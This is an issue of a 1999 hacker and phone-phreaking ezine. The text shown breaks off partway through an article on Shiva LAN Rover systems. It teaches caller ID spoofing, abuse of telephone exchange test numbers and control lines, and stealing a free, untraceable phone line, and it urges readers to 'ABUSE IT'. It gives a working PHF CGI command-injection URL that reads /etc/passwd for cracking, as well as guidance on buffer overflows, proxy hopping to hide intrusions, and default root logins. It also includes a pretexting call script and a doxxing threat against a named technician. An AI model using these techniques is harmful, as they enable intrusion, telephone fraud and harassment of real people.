Copy Link
Add to Bookmark
Report

f41th Issue 03

eZine's profile picture
Published in 
f41th
 · 4 years ago

  



yyyyyssssyyyy yyyyssssyyyy yyyy yyyy
|lS$$ yy $$$$ """" yy lS$$ S$$$ S$$$$$ $$$$$ S$$$ssssyyyy
:|lS$ ""yyyyy yyyyssss|lS$ lS$$ lS$$ yy$$$$$ lS$$ yy lS$$
:||lS$$ $$$$$ :|lS yy :|lS |lS$ |lS$ $$ yyyy |lS$ $$ |lS$
:::|l ,$$$$$ ::|l $$ ::|l :|lS :|lS $$ :|lS :|lS $$ :|lS
::::| $$$$$$ :::| $$ :::| ::|l ::|l $$ ::|l ::|l $$ ::|l
.:::: ....... .:::....:::: .::| ..:|....:::| .::| .. .::|

F41th Issue III [April 1999] D4RKCYDE tHE cOLLECT1VE
darkcyde.8m.com
#darkcyde EfNet.

Contents:

--> Editorial. By hybrid <-----Ooo---
--> CLID Faking. By TheDohBoy <-----Ooo---
--> Fone Technologies Of The New Millenium. By TheDohBoy <-----Ooo---
--> Local Exchange Phreaking. By TheDohBoy <-----Ooo---
--> How Brakis Got A Phree Fone Line. By TheDohBoy <-----Ooo---
--> Installing Linux, how to get it werking. By Bodie <-----Ooo---
--> Overview of some common exploits. By Bodie <-----Ooo---
--> The ShivaLanRover System (@ Userid:) By hybrid <-----Ooo---
--> How to be 3l337 in 10 Easy Steps. By Force <-----Ooo---
--> BT Network Tones and Announcments. By Force <-----Ooo---
--> UK Hand Scan of O8OO 919. By Force <-----Ooo---
--> The SS7 telephony protocol. By hybrid <-----Ooo---



.. .... .. " Richard, CO, how can I help you? " .. ....
Hi, this is Mike up in network administration,
Just calling to confirm the problem with the
network maintanance on stack 82 of your router.....
" Yes, the problem was fixed about 30 minutes ago,
apparently there was a problem with the
smps..... "

Sure.. listen, we've set up a routine output port
on 512 XXX XXXX, emiting 300 Hz every 12 Ms, can
you check that the line is still functioning?... ..
" No, it appears to be a standard line.. ... "
OK Richard, we'll set another one up in about 15
minutes, in the mean time terminate the line and
I'll call you back soon to confirm the stack emiter. ..
" No problem, I'll reset the asp... "
<click>
.. ...... .. 512 XXX XXXX... " Where' sorry, the number you
have called has been disconnected, no further
information is available about this number "
... ...

(bye bye)

---(OOooOO)-------------------------------------------------------------(OOo-
---(OOooOO)---[supreame f41th diplomatic editor in chief]----[hybrid]---(OOo-
---(OOooOO)---["find me on the PSTN bitch"]----[th0rn@coldmail.com]-----(OOo-
---(OOooOO)---[el8 minister of foreign espionage]------------[downt1me]-(OOo-
---(OOooOO)---["..__... _ ...__.."]--[downtime@webcrunchers.com]--------(OOo-
---(OOooOO)---[crack cocaine p1mp]---------------------------[alph4vax]-(OOo-
---(OOooOO)---["i be the king of buffer overflow"]----------------------(OOo-
---(OOooOO)---[supreame master of beaste boy qoutes]---------[force]----(OOo-
---(OOooOO)---["i jumped outside with my walkman on..."]----------------(OOo-
---(OOooOO)---[bagpipe player, and hagis master]-------------[doh-boy]--(OOo-
---(OOooOO)---["bollocks"]----------------------------------------------(OOo-
---(OOooOO)-------------------------------------------------------------(OOo-
---(OOooOO)---[elf]--[tonekilla]--[mortis]--[bishopof_hell]--[zomba]----(OOo-
---(OOooOO)---[digital_fokus]--[s1nt4x]--[angel]--[mistress]--[lowtek]--(OOo-
---(OOooOO)---[digiphreak]----------[darkcyde.8m.com]-------------------(OOo-
---(OOooOO)-------------------------------------------------------------(OOo-

---(Oo)----[elite]:

telnet/ftp: fedworld.gov, even more elite: ch1ckie. Yugoslavian h4x0rz &
h4x-wh0r3z. Beaste boyz, blur 13. Guano Apes 'lords of the boards'..

---(Oo)----[lame]:

people who find it amusing to live out their pointless existance taking over
irc channels. PLUK. mrsp00n. AT&T conf lamers. Mr Clinton of the wh0re house.
Propoganda and patrioctic Bill clinton speaches, not forgeting Mr Blair.
lamer still: PBX whorez who call themselves phreaks. Lame as shit: 'cooldave'
...cooldave is one of the latitude techs who maintain meetingplace
confs, don't fuck with us bitch./ we got your land line number, registration
plates, SS number, family medical history, we even know the brand of your
fucking toothbrush.


---(OOooOO)--------Editorial--------------------------------------------(OOo-
---(OOooOO)--------by hybrid--------------------------------------------(OOo-
---(OOooOO)--------th0rn@coldmail.com-----------------------------------(OOo-


f41th has finally began to take off. When we first came up with the idea of
producing an ezine we nether thought we would get to issue 3, but now we
intend to keep going. The idea of f41th is to create an ezine that is aimed
at the American as well as UK h/p scene. f41th is not intended to be a raw
information resource, but is supposed to be entertaining to read at the same
time. We still need more people to submit articles for f41th, so if there is
anyone out there who wishes to have an article appear in our zine, just email
anything to me or any of the d4rkcyde members. I can be emailed at many
address, but mainly th0rn@coldmail.com. The d4rkcyde website is still
undergoing maintanance, and we hope it will be back up and running properly
soon, to visit our site goto darkcyde.8m.com. The other day someone called
f41th a 'wanna-be' zine. I'd like to say we are not trying to be like anyone,
we are just producing a zine that is usefull to both UK and US audiences.
Apart from that comment, we have had quite alot of good feedback from various
people, I'd like to say werd to everyone who has commented on the zine with
a more positive flavour. Anyways, that's my short editorial over, hope you
enjoy f41th 3, WERD.


---(OOooOO)--------cLID Faking------------------------------------------(OOo-
---(OOooOO)--------by TheDohBoy-----------------------------------------(OOo-
---(OOooOO)-------------------------------------------------------------(OOo-


OK, in this article I'm going to cover the basics of CLID (Calling Line
IDentification) and how it affects the humble phreak.

CLID Is Different From ANI!!!

A lot of people get confused about the difference between these. ANI is an
age old ID method whih is only accessible by your local exchange. Its
basically a test of voltage levels in your local loop to see "who's making a
call right now"
As you can see, anyone outside your exchange has to "trace"
the path of the call through a maze of trunk lines. For the local exchange,
the loops are grouped into "pools" of certain numbers. So say your number was
123456, well for a start your lucky to have such a memorable number!, but how
does the exchange work out your number. Well the main "pool" you are a part
of is the 1 pool. This consists of all numbers beginning with 1 in the
exchange. This then splits off to other sub-pools, like 10, 11, 12. So after
going through six sub-pools your unique number is reached. This is how 175
works for reading out your number (on System X) So if you dial 141 then 175
it will have no effect. CLID is digital information (derived from ANI
intially) which is sent from exchange to exchange, and occasionally on to
subscribers with the CLID service. This can be withheld by dialling 141 in
the UK, or by using star services in the US. 17070 works using this.


How can I stop ANI going out on normal calls?

Well the method of diverting (just getting an op to connect you to the
number) gets rid of both ANI and CLID. The ANI dis-appears completely, and
the CLID is what is known as the generic paket. No info about you can be
given from this packet.

ANI and call logging.

Call logging is done at your exchange and this shows all numbers you have
dialled. So even if you dial 141 before dialling you can get snared by the
caller log. Diverting only shows that you have made an operator call, and
loads of people are dialling the op at once, so this is s good solution to
that problem.

OK, I can get rid of all my ANI/CLID/Caller Log info, but can I fake my CLID
so that I look like somenone else?

The good news is that you can with a little knowledge of CLID protocols, and
maybe some programming knowledge. What you need is a program that can
transmit given CLID information to CLID Units (the ones that show
residential/business customers the number before they pick up) How these
units work is that they listen on the line for a warning tone from the
exchange, and then a modem recieves the CLID info before the fone rings. All
this takes place in a fraction of a second.

So all that is required is such a program. And the following method:

1) Divert through an op to call the number you wish (or dial 141 at least)
2) Wait for pick up, and when they go off hook, send the CLID packet
3) Do what you want

How this looks at their end is as follows:

1) Fone rings and CLID unit says "Operator call" or "Number withheld". They
then pick up the reciever (and possibly hear a "cheep")
2) The unit then says the fake number on its screen.

This is perfect for 0800 numbers, because they have CLID units. Its also good
for ISP's, and even certain telephone companies!! What won't be fooled is
1471, but if you've done it right then there will be no number there.

Thats all I can think of now, maybe we'll see a good proggie spring up to
help us soon!


---(OOooOO)--------Phone Technologys of the new millenium---------------(OOo-
---(OOooOO)--------by TheDohBoy-----------------------------------------(OOo-
---(OOooOO)-------------------------------------------------------------(OOo-


Pretty snappy title huh.. Well In this article I hope to focus on
technologies which are yet to make their way to the end user. I'll be taking
the point of view of a phreaker who wants to know the possible loopholes of
the taechnologies.


Wavelength Division Multiplexing.

A really great technology which could cut the cost of calling pretty much
100%. Everyday multiplexing is done using the TDM (Time Division
Multiplexing) technique. This technique allows Multiple subscriber to
subscriber calls to utilise the same trunk lines. An illustartion to show
how this works follows:

Call 1: (First in line) ------------
-
Call 2: (second in line)-------------------Single trunk line holding *1* call
at any time
-
Call 3: (Third in line)-------------

Realistically the line numbers would not have a one to one correspondence
with their order in the queue.This would be allocated using an algorithm
stored on switching equipment. The usage of the network is never 100% and so
the loss in quality of the calls is *very* minimal. As one can see this
method will have its problems. There is an upper bound on the call capacity
set by the sampling rate of the sound levels at the subscribers fone and the
number of subscribers using the line at any one time. The upper limit varies
directly (assuming that the number of callers at the peak is roughly
constant) as the sampling rate. One way to overcome this is to use seperate
wavelengths for seperate calls (or TDM lines). This means that each WDM line
can carry a multiple of the equivalent TDM lines. This means the cost to the
end user should vary directly as the cost of TDM and inversely as the
equivalent number of TDM lines per WDM line. Local calls (in the UK) are
already 1p per minute for a standard line so even a small WDM/TDM ratio could
see calls becoming *extremely* cheap. The fone will become just another
utility which can be left on all day (much as electricity is now). There are
two main pitfalls which I can think of about this technology. Firstly there
is the problem of interference from other calls. This effect will be much the
same as radio interference causing call quality to drop. A possible solution
would be to allocate wavelengths based on prime numbers. These would not be
harmonics of any other signal in the wire, stopping interference almost
completely. Phases can be allocated randomly also to prevent interference.
Another is the limited spectrum available. Due to the photo electric effect
most of the signals will have to be sent (along fibre optic cable) at a
wavelength particular to the materials used in the detectors. If digitally
encoded, the transfer rate (although HUGE) will be limited by the switching
times of the semiconductor equipment at the other end. An advantage for the
telcos is that conference call facilities can be made just by "tuning" three
calls into one wavelength on a specific line. No doubt this could be taken
advantage of to listen on others conversation or step up trunks e.t.c. I
would expect also that inter-office signalling would travel on the same lines
as consumer calls. Perhaps if telcos are thick enough to put them at the
lower end (where the density of calls is greater) these can be "tapped" by
phreaks. I think that covers most of what phreaks need to know about WDM.


Telefony Over The National Grid.

Another high bandwidth technology (which may even incorporate the above
system) which can see the cost of calling drop. I doubt this will ever get
off the ground personally. BT/AT+T will see their profits at risk and will
try anything to stop this technology taking hold. Basically how this works is
to sned signals over the electric distribution system. A pretty good idea,
especially as the system can provide high bandwidth on a system already
present in peoples homes. One obvious advantage to telcos invoived would be
that it would stop beige boxers :> (clip clip, ring ring, fry fry!!!!) Up to
subscriber level the system is bound to be similar to the structure of the
PSTN system, i.e. sub-units acting as exchanges e.t.c. It will look quite
similar to the normal fone network.

IP Telefony.

Notable in that its already in existence. To check out a good example go to
www.net2phone.com and download the software. That gives you 1-800 access and
a complimentary bundle of minutes. This is the use of the internet to conduct
voice telefony. It can be thought of as a gateway between the internet and
the PSTN (although some applications of this only go net-net) This makes
calling intenational as cheap as a local call to your ISP so that cant be
bad. Things like NetMeeting and Netscape Conference/Cooltalk are already in
use and are free to use. BT already feels threatened and is ploughing alot of
money into this technology in order to save it market share. As for call
quality I think its about as good as a digital mobile driving down the M1 at
100mph in that the volume varies considerably. This is due to the packet
technology in use on the net. Good news for hackers is that the servers can
probably be hacked and used to route calls through. Also, AT+T are providing
an IP Conference call system (Free for ten minutes during the Superbowl) This
will allow you to put in numbers, and then call them all at once using your
computer. Check around on the net for such things, they are growing steadily!


Videoconferencing.

Aaaahh.....Takes me back to when I was at a BT exhibition in 96/97 when they
had their videofones on display. Of course they had two set up to allow two
people to talk on them. What they forgot was that if you hung up you could
dial out on them. So if BT can be that stupid well who knows! nyhoo back to
videofones. Businesses are increasingly using these as it provides an ideal
solution to the problems of teleconferencing. i.e. talking over someone else.
No doubt as the service expands in bandwidth perhaps TV and the net may
integrate into this service, providing a one stop comms shop as it were. No
doubt BT would charge a premium for this kind of thing!!!


GPS Cellfones

Dangerous technology for the phreaker if this becomes defacto. Think of the
ability of an operator being able to trace not only your number but *exactly*
where you are!!! Very bad stuff.

Free Local Calls In The UK

Finally in 2000 (approx. when OFTEL takes the restrictions from BT) we can
take a leaf from the book of our American phriends and learn how to step up
trunks and so on. Local PBX hacking will become normal and the appeal of
Meridian Systems may wane slightly. Perhaps a way can be found to busy out
certain routes and make the switching systems hand you off up the trunk, a
few key presses later and you can make a free call anywhere!!! The weak link
there is trying to block certain paths through the system. I'm looking
forward to this (he says rubbing his hands together)


---(OOooOO)--------Local eXchange Phreaking-----------------------------(OOo-
---(OOooOO)--------by TheDohBoy-----------------------------------------(OOo-
---(OOooOO)-------------------------------------------------------------(OOo-


Engineer Line Testing
---------------------

This is info I stole from a guide sheet for BT Engineers. It basically gives
them a list of numbers which they can use for testing lines/recording line
activity e.t.c. This can come in useful for the phreak intent on controlling
certain aspects of someones line. Some of this may have been covered in other
artices, but I think the stuff on ASU's is relatively new.


Testing On System X
-------------------

Subscriber Automatic Line Test (SALT)

175 - Voice read out of number, follow prompts

01 Dial test
02 Power down line (shuts line down for 3 min. also wipes ANI)
6 Partial recall
7 Full recall, returns adiministrative DT
06 Power down exchange (I've never seen it happen btw!)
No response - New DT

Cable Pair Identification

176 Followed by Full area code and number of line on which tone is placed.
Should get NU Tone, this means succesful placing of tone on on line.


Testing On System Y
-------------------

Subscriber Automatic Line Test

175 - Fast engaged tone/interrupted dial tone

Commands same as System X

BT Linetest Facility

This is a doosie of a number, it was covered in last months issue of SWAT so
I am technically repeating this but........

17070 - Read out number (if no CLI no readout)

1 For ringback, 2 for quiet line, 3 for fasttest, 4 for fasttrans, or clear
down.

1 Rings back upon clear down
2 Gives quiet line for testing LN
3 Gives ring back line test, Line test, Cable Pair Identification e.t.c.
4 Recodring of test results
Clear Down = Hang Up


ASU's
-----

OK so your asking what the hell an ASU is. Its basically the main control
point for that local area code. Not all exchanges keep these in the range I
am specifying but do some scanning and you should find them. ASU's allow
switching engineers to control the main features of the switch from a remote
fone. I don't have to spell out what this means for the phreak.

ASU's in most exchanges are found at <area-code> <exchange-code> 9999
They should present you with a message requesting a pin. You may need to
sleep with a BT employee to get one of these. You could war dial one, but for
gods sake NOT FROM YOUR HOME FONE. Once inside you can check the volume of
calls coming through the exchange, perform house cleaning tasks on the
switch, mess around with lines. You name it. Hack one of these and you will
become 31337. An interesting point I might like to make about these numbers
is that they automatically step you up to <Trunk Level 0> or STD level. This
means if you dial your local ASU you will be stepped up to National level.
Find a break signal like on 175 (after ring back flash hook) then you can
mess around on national lines for local rates.


Fiddles
-------

These are fixes put in the circuit by fraudulent engineers wishing to exploit
their position. They hide these in the 17x range and they are unique to each
exchange. There are only 10 numbers to look through. They are usually hidden
behind NU tones or "sorry........" messages. Mess around on each number till
you find a fiddle. You should be able to make free calls off these, or
possibly access looped lines. Either way, corruption in a powerful
organisation is inevtiable, ABUSE IT. If you find a fiddle and want to use it
outwith your own exchange your going to have to either find a PBX in your
area in the 0800 range or hook a black/beige/gold box combo and dial through
that.


CSS's
-----

The Holy Grail of numbers. If you find this you will become more 'leet than
Captain Crunch, Whistlin' Joe, Onkel Deitmeyer, and Alexander Graham Bell put
together. You can do SHIT LOADS with this number. You can even check up on
line records of any number in that area and see the caller log. There are
dial ups on PSTN and over the net through a special BT server. I also believe
there are dial ups on PSS/Featurenet. To find a CSS you may have to know a
BT employee or if you don't it'll take LOADS of scanning, hacking, and heart
attacks over your local exchange. Scanning in your local prefix is always a
good bet.


Exchange Dial Ups
-----------------

Your local exchange WILL have a modem dial up on PSTN or PSS/Featurenet. Once
you have found this you can access fun things. Tracing calls is rather easy
from these. Changing Line status and so on is also easy.


Weeuurd Stuff!!!
----------------

I found a severely weird number on a 373 scan I did myself. Its 0800373983.
Its exactly the same as 17070!!! Whats weird is that I can dial it from non-
BT fones (including my Orange JustTalk) and use it to test lines (great for
bieging) It'll probably die now that its in the Public Domain but hey! why
not share.


Wrap up
-------

Thats all I know on the subject of local exchange phreaking at the moment.


---(OOooOO)--------How Brakis got a free fone line----------------------(OOo-
---(OOooOO)--------by TheDohBoy-----------------------------------------(OOo-
---(OOooOO)-------------------------------------------------------------(OOo-


What is documented here is the result of a group of four phreaks fucking
about with mates fone line. The techniques enclosed are not only accessible
to the 'leet, anyone can use them. Basically, this is how we got Brakis a
phree, untracable fone line. Brakis *used* to be with BT but hated them so
much that he moved to a competitor (No names mentioned) Naturally when he
switched BT came and took his fone line off. I might mention of course that
he did have two BT lines, and now has one (legit) BT line which is a business
line. Well when we started off we were on the jolly side of drunk and had the
idea of Beiging Brakis' old line. ODC had the great idea of checking the line
length using 17070. He did this from my Orange Mot. c520 (I have a 17070
dialup, I aint making it public, mail me if you want it) The test came back
and the line length was 2.4km. This was odd because the distance from Brakis'
house to the local BT Xchange was about 2.4km!!! So ODC reckoned that the
line was terminated INSIDE BRAKIS' HOUSE!!! After fixing the second line
after we screwed it up a bit, we hooked our Bieges onto the terminated wire
pair. THERE WAS A DIAL TONE!!! We tried dialling a few 0800's but got
nowhere, then we dialled 100 and got thro! ugh!!! We could get the op to
connect us to wherever we wanted. We then called it on the cellfone to check
to see if it could get a call back trace. We got: "Sorry, the number you have
dialled is not available"
There was no CLI on the line, it couldn't ghet
traced, and it was FREE. Its the perfect line!!! You can follow more or less
what we done for yourself if you want a foneline for phree. Just use 17070 to
test your old lines, if BT were as stupid as they were in our case, you can
get yourself a line. Cheers!!!


---(OOooOO)--------Linux, how to get it werking-------------------------(OOo-
---(OOooOO)--------by Bodie---------------------------------------------(OOo-
---(OOooOO)--------bodi3@usa.net----------------------------------------(OOo-


I don't care what anyone says, you can't be a hacker unless you have some
form of unix on your machine, how are ya gunna do anything with the iron grip
of windoze on your computer?. This file will describe how to get linux on
your machine and get up and running.

Most people now want to dual boot with both windows and linux on their
system, this is what i use, because no matter what people say there are
programs that can only be run in windoze and some of these can be extreemly
useful. If you want to do this, take my advise and ignore all the windows
documention, you need to install windows first and then install linux on top
of that. The reason for this is that windows doesn't play well with others
(it doesn't really play well with anything else full stop, but thats another
story)

**************
*****NOTE*****
Installations of linux vary widely in their setup procedure, make sure you
read the manual first if you have any problems. If that doesn't solve it,
feel free to mail me and i'll see what i can do to help
**************


After you have done this you will need a copy of partition magic, I think
this is shareware now but if you can't find a copy, mail me and i'll get one
to ya. Once you have partition magic installed, you will need to set 2
partitions for linux, one will be a swap partition - and the other will be
the main linux partition. Many people have different opinions about how big
the swap partition should be, but i have one about 100Mb and that does me
fine. The main partition should be as large as you can make it. The
important thing at this stage is to leave both partitions unformatted.
Partition magic doesn't currenty have support for linux partitions and you
will be able to format it later during the installation of linux.

The next thing you will need to do is to make a boot disk, if you bought a
copy of linux it is likely that boot disks came with it, if you got a copied
version or got it any other way, you won't have a boot disk. Creating a
boot disk is different on each version of linux, normally there will be a
utility that you can access from windows or dos that will allow you to create
one easily (look under the directory /dosutils or something similarly named,
if you have any problems mail me and i'll see what i can do). Once you have
done this you will need to reboot the machine with the boot disk in the drive
(make sure you have floppy booting enabled in the BIOS else this won't work)
and the linux CD in the drive. You will now boot into linux.

**************
**IMPORTANT***
Make sure you have the full spec of all your hardware with you at this point
**************

This is where each different version of linux has a different installation
procedure. I have installed Slackware, Red hat and SuSE and they have all
had wildly different user interfaces for the installation procedure. Basicly
all you have to do at this stage is tell the system what partitions you have
on your hard drive, what swap partitions you have made and which partition
will be used as the main partition for linux, then it will format both the
swap drives and main drive for the linux file system. You can also access
DOS drives from linux (something which is not easy to do in windoze) you just
have to tell linux where to find the partitions.

**************
*****NOTE*****
The hard drive lableing is very different thant he lableing used in windows.
All linux devices are contained within a directory called '/dev'. The First
partition on the primary hard drive is labled '/dev/hda1'. The second
partition is labled '/dev/hda2' and so on. If you have a second hard drive
it is labled '/dev/hdb'. This may seem strange to anyone who has been using
DOS, but it means that linux system may run under what is called a single
root system. This means that there is 1 top level directory called '/' and
all the directories are below that. Hard drives can be access by mounting
them in a directory. This creates a link between the device in /dev and the
directory the drive is mounted in. You must specify a directory where they
will be mounted at install time, then accessing a seperate dirve will be just
like accessing another directory.
**************

Next you will probably see a list of programs that you can install if you
want to. What you want to install is up to you but you may want to install a
lot of programming tools so you can install other packages that may requre
libraries that are contained in these packages. Next just sit back, make a
cup of tea and watch it install. Reboot and you've got a linux system up and
running....Congratulations :)

Once you have done this take a look around the file systems, try out some
commands. Some of the main command in linux are:

cd <directory> - same as DOS, change directory
mv <source> <destination> - Move a file (as there is no rename command in
linux, this serves as a good alternative)
cp <souce> <destination> - Copys a file
ls - Lists the contents of a directory (similar to dir in DOS)
more - This basicly prints out any imput it gets, a very useful program
crypt - This is possibly the most useful program in unix, it encrypts files so
even the sysadmin can't read them, any sensitive information
on a foreign system or even your own system should be
encrypted

I could spend my whole life explaining all the various commands available,
but i'm not gunna do that, 'cus you can look that u in a book if you want to
use them. One more interesting feature of linux is input redirection. This
allows you to pipe input from one program directly to another. One of the
most common examples of this is:

ls | more

This uses the '|' charictor to redirect output from the ls program to more.
This is often used when there is a long directory listing, ls displays the
output so fast that no one could read it, but more allows you to read output
one screen at a time. The other input redirection charictors are '>' which
allows you to write the output to a new file, and '>>' which allows you to
add the output to the end of a file that already exists.

As i said earlier, the file system in linux is very different from the
windows file system. A simplified version of the file system is shown here:

/ (ROOT)
|
-------------------------
| | | |
/bin /users /etc /dev
| | | |
... ... ... ...

There may be many other directorys as well, but these are the main ones. The
'/bin' directory contains all the executable programs that are available to
users of the system. Sometimes a link to another location is put in here so
the file is executable from the /bin directory, but it is stored somewhere
else on the system. Sometimes programs are also stored in the '/usr/'
directory.

The '/users' directory is used for storing user areas. This is where
individual users store all their files (unless you need to be using the root
account it is a good idea to use a normal user account to avoid accedental
damage to files or, if you are on the net, it allows another hacker to more
easily hack your system).

The '/etc' directory is where all the config files are stored for the system.
This directory contains the passwd file (and in some cases, the shadow file)
It stores files that the system calls as variables for various programs.

The '/dev' directory is the place where all the devices that the system uses
is stored. This includes the mouse, keyboard, hard drives and lots of other
things, the basic idea is that when a device wants to input anything into the
computer, it puts the data in these files, then the system captures this data
and uses it. When data has to be outputted to a device, it is put in one of
these files and then is sent by the system to the device. This may seen a
complex way of doing things, but in actual fact, it makes it a lot easyer for
programmers to perform operations on various devices, as they only have to
access a file rather than a device. (if ya don't understand this bit it isn't
important for the moment)

There may be several other directories under the root, but these are the main
one's that you will have to wory about for the moment.

The next thing you will have to do is set up X-Windows, this is a graphical
interface for linux. The thing about X is that there are many dufferent
versions of the desktop enviroment, unlike windoze where you just have the
standard enviroment. This is good because you can decide on the style that
suits you best. Personally I prefer KDE at the moment but there are different
one's coming out all the time. to set up X you will need to have the full
specs on your monitor and video card ready. There are 2 ways to set up X,
one is a graphical way, that is quick and easy, but may not work in some
cases (i had hell with this). To run this, at the command line type:

XF86Setup

Or to run a command line setup interface type

xf86config

You will then be presented with the usual menus that ask you about your
hardware. Get that up and running and you SHOULD have a decent working
version of X. A lot of things can go wrong here though, most people have
problems of some sort. The best thing to do, if you do have a problem is to
go back to the config programs and make sure you had the right specs for your
hardware. Failing that you could try editing the '/etc/XF86Config' file.
Although doing this is quite complicated and i would suggest reading up on
how to do it first (or just wing it like most people :) )

Now you should have a fully working linux system installed, well done. There
is a lot more that i haven't mentioned in this file and the chances are you
will have to read lots of other files to get various things working or learn
about other programs. Linux is an amazing thing if you make the most of it
and ask what it can do rather than what it can't do. Welcome to the new
world
----------
Greetz

Anyone who can get me a pre-release copy of star wars: I'll pay any money -
pleez

the usual bunch of people who know i appreciate them :)


---(OOooOO)--------Overview of common Exploits--------------------------(OOo-
---(OOooOO)--------by Bodie---------------------------------------------(OOo-
---(OOooOO)--------bodi3@usa.net----------------------------------------(OOo-


This file is a basic explanation of some of the methods of exploiting
systems, it is not a full list, there are many exploits and to list them all
would take a up my whole hard disk, but these are the most common.

1) PHF

Largh if you like but it's supprising to see how often this still works.
Although the number of systems vulnerable is very small now and getting
smaller by the day it still saves a lot of time over some of the other
exploits. This exploit is even useable by windoze script kiddies.

It works because of a bug in a commonly used CGI script called PHF, this
allows any remote user to see any file on the system and even execute
commands :) To use it open up a web browser (If you wanna be really 31337,
you can telnet to port 80, but why make life hard for yourself) go to :
http://www.vulnerable.com/cgi-bin/phf?Qalias=x%0a[command]
where [command] is the command you want to execute. A command you can
execute is:
http://www.vulnerable.com/cgi-bin/phf?Qalias=x%0acat%20/etc/passwd
This will execute the command:
cat /etc/passwd
the %20 is used because it is the ascii charictor for space and you can't
use a space in the script. This command will give you the password file and
then you can start using your faverite cracker to get the passwords :)

Other CGI Exploits

PHF is just one example of a CGI exploit. The CGI (Common Gateway
Interface) is a system that allows people to interact with web pages. They
are used in signup processes, games or almost anything on the web. PHF
is an example of a vulnerability in a CGI program but there are many others.
the best known of these is the test-cgi exploit. This allows you to veiw
the contents of any directory, although this doesn't automaticly allow you to
get root access on the system it will allow you to gather usernames of users
on the system. This will sometimes show up any default accounts on the
system


2)Buffer Overflow Exploits

There are too many of these to name each of them but they all work on the
same principal. Examples of these would include statd, qpop and many more.

Each program can store data in an area of memory called the stack. This
stores data from each routine that a program calls. in a program like this
(a little programming knowledge is needed)

#include stdio.h

void hello() {
printf("hello");
}

void main() {
hello()
printf("now f**k off")
}

This is a very simple program which calls a routine hello() to print "hello"
to the screen (I would've used "hello world" but i couldn't spell world :)),
when the procedure hello is called, any data from the main program is put
onto the stack. In this program there is no data that has to be stored, but
it still has to store the location in the program so when it finishes
running the procedure hello() it can knows where is got to in the program
and prints "now f**k off" next. To enable the program to do this a return
address of the next instruction is also stored on the stack.

Helpfully, the buffer is arranged like this:
_______
|return |
|address|
|_______|
| |
| Data |
|_______|

This means that the data is put on the stack in a nice convenient position,
right next to the return address. The data area is allocated as the total
space allocated to all the variables that have to be put on the stack, in
out little program earlier there was no need to store any variables as there
were none, but most programs will have variables that they need to store on
the stack. How do ya exploit this? Look here:

void ouch(char *ot) {
char hitme[10];
strcpy(hitme,ot);
}

void main() {
char hehe[100];
int hmm;
for(i = 0; i < 10; i++)
hehe[i] = 'A';
ouch(hehe)
}

Now, here's where it gets a bit more exciting. First the string, 'hehe' is
filled with a long list of 'A's, this makes sure that the string is full.
Then the function 'ouch' copies the string 'ot' into the string 'hitme', in
this function, 'ot' refers to the string 'hehe' in the main body of the
program. 'hitme' is 10 charictors long and so is allocated 10 bytes, but if
we copt 'hehe', which is 100 bytes long into 'hitme' we won't have enough
space. Unfortunately the function we use to copy these 2 strings, strcpy,
doesn't check the length of the strings before it copies them. This means
that the contents of the string 'hitme' is bigger than the space allocated
to it. This causes the string to overrun into other memory areas like this
______________
| |
| |
Space allocated |--------------|<------- Actual end of data area, due to
for return ---->| | large size of 'hitme'
address |______________|<--------End of space allocated to data area
| |
Space allocated | |
for data area ->| |
| |
|______________|

This means that some of the data area will be taken as the return address.
In our program, the return address will be filled bit a line of 'A's, this
won't be a real address in the computers memory so it will obviously bomb
out with an error.

This type of error can be caused deliberately on some commercial programs
and, more interestingly, unix security programs. This means we can
manipulate the return address of the program to go to anywhere in the
computers memory. The most common way of exploiting this is to place code
into the data area of the buffer and have the return address point back to
that point in the buffer, this means we can insert our own code into the
program. This opens up the system to all sorts of wonderful effects :)

This was not a total explanation of buffer overflows, for more information
get phrack issue 49-14

But if ya names so1o ya don't need to bother with this, just type:
exploit [vulnerable host]
but this is written for any real hacker who wants to know what goes on behing
the code. More to come, but this file just gives ya a general feel for the
exploits.

3) Wingates

Wingates have become very popular amongst hackers recently, they allow you to
bounce a connection from any site running one of these, a wingate is basicly
a proxy server that allows you to send all your connections through that
host. Unsupprisingly because of the obvious security holes (and maybe
because of the name :)) a wingate can only be run on a windoze server or even
just a home box can run a wingate. A wingate was initialy built for a small
windoze network to access the net over one line without all the hassle of
setting up all the network software. In other words, it's another microshaft
security hole, something we've seen a lot of in the last few years.

Basicly all ya have to do is find a computer with a wingate running and
connect to it, then you can safely hack away :)

4) Exports

Some nice servers actually let you view almost any file on their system by
allowing their whole system to be mounted onto any foreign host. This is
extreemly kewl because it means that, if you are logged on as root on your
system it will mean that you have root priviliges on the remote system. This
exploit also works in windows, that is why you should never allow any of your
directories to be shared when you are on the net unless you don't mind loseing
the data in the directories and it doesn't contain any confidential stuff or
(as wth an unnamed person) your entire dox, thats just stupid

--------------

More to come, this will give ya a general feel for the exploits but i'll
explain them in more detail in other files - just to keep ya coming back

greetz:
Hybrid: Genrally kewl geezer who nicks my modem :)

The old bloke who turns up in Mcdonalds at 2600 meets: One of the wierdest
people in the world (Just beat me to it)

Pro plus: keeping me awake during all those long hacking nights

The US military: Supplying all my shells

9x: supplying t-files so that everyone can copy them


---(OOooOO)--------Hacking the Shiva-LAN-Rover System-------------------(OOo-
---(OOooOO)--------by hybrid--------------------------------------------(OOo-
---(OOooOO)--------th0rn@coldmail.com-----------------------------------(OOo-


**************************************************
* Disclaimer: *
* *
* The information provided in this text file *
* has been obtained from public domain resources *
* and is intended for educational use only. *
* *
**************************************************


Contents:

1. Introduction
2. What can Shiva lan rovers do?
3. The command line
4. System security
5. PPP

1. Introduction

Shiva systems are becoming increasingly popular in the LAN networking world.
If like me you have done quite alot of scanning you would have come accross a
login prompt similar to this: [@ Userid:] If you have never seen this before,
take a look at some of the 9x scans at www2.dope.org/9x. In this file I am
going to fokus on the security strengths and weaknesses of the ShivaLanRover
networking system, and give a general overview of what can be done with such
systems. The Shiva system is a network security problem in it's own right, in
the sense that once you have gained access to one of these platforms, you
have the opotunity to explore the entire network on which the system is
based, in essance, you are on the trusted side of the firewall. If you would
like a copy of the ShivaLanRover software just FTP to ftp.shiva.com or get it
via the WWW.

To find a Shiva, the first thing you should do is dust off that old wardialer
program, and start scanning local or toll-free prefix assignments, if you
can't do this, you suck, go away. You will know when you have found a Shiva
when you are confronted with the following prompt:

@ Userid:

or if Radius authentification is enabled:

Starting Radius Authentification....
@ Userid:

Blah, ignore the radius authentification thing for now, it's just a lame
attempt to make the system look as if it has been secured, in most cases the
sysamin would have missconfigured the authentification and you will be
supprised as to how easy it is to get in. So you are at the login prompt,
what next? - As in most OS's Shivas have a nice set of default logins, so the
sysadmins poor setup is your gain. Try this: login: <root> pass: <NO PASS>.
